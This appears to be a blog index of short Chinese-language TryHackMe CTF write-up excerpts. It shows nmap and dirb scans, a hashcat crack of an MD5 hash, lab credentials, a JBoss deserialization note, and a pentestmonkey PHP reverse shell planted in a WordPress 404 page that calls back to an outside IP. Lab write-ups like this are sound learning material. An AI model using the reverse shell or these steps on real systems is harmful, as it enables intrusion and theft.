MoonlitSyntax

唉,不知道干什么 一眼dev 去看,又是8.1 rce

[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-12 13:43 CSTNSE: Loaded 156 scripts for scanning.NSE: Script Pre-scanning.NSE: Starting runlevel 1 (of 3) scan.Initiating NSE at 13:43Completed NSE at 13:43, 0.00s elapsedNSE: Starting runlevel 2 (of 3) scan.Initiating NSE at 13:43Completed NSE at 13:43, 0.00s elapsedNSE: Starting runlevel 3 (of 3) scan.Initiating NSE at 13:43Completed NSE at 13:43, 0.00s elapsedInitiating Ping Scan at 13:43Scanning 10.10.139.174 [2 ports]Completed Ping S ...

hard啊 php wordpress 404进去 C:\Users>whoami /all ERROR: Unable to get user claims information.USER INFORMATION----------------User Name SID ================= ===============================================================iis apppool\retro S-1-5-82-3788814120-2795558051-4026253505-1810414383-1644260341GROUP INFORMATION-----------------Group Name Type SID Attributes ...

/invoker/JMXInvokerServlet请求中读取了用户传入的对象，可以通过Apache Commons Collections中的Gadget执行任意代码 用给的poc grep -R "THM{" * 2>/dev/null root里是这 QkM3N0FDMDcyRUUzMEUzNzYwODA2ODY0RTIzNEM3Q0Y== base接一下 BC77AC072EE30E3760806864E234C7CF 不知道有什么含义吗 hashcat -a 0 -m 0 BC77AC072EE30E3760806864E234C7CF /usr/share/wordlists/rockyou.txt --force zxcvbnm123456789 …

我要找的就是这个呜呜呜呜 首先是目录扫描,发现到robots,license,login等有用的路由 elliot:ER28-0652账号密码登录即可 发现是个wp的网站,直接修改404页面反弹shell <?php // php-reverse-shell - A Reverse Shell implementation in PHP // Copyright (C) 2007 pentestmonkey@pentestmonkey.net set_time_limit (0); $VERSION = "1.0"; $ip = '165.154.5.221'; // You have changed this $port = 9999; // And this $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0 ...

┌──(kali㉿kali)-[~]└─$ curl -I 10.10.45.78/api/fl46HTTP/1.1 200 OKServer: nginx/1.19.6Date: Mon, 05 Feb 2024 03:53:32 GMTConnection: keep-aliveflag: THM{b801135794bf1ed3a2aafaa44c2e5ad4} kali莫名变好了点 dirb http://10.10.45.78/.well-known/ -X .txt 总之现在找到exif-util文件上传,快照,想ssrf robots里还有一个backup,先看看 <script>export default { name: 'Exif Util', auth: false, data() { return { hasResponse: false, response: '', url: '',  ...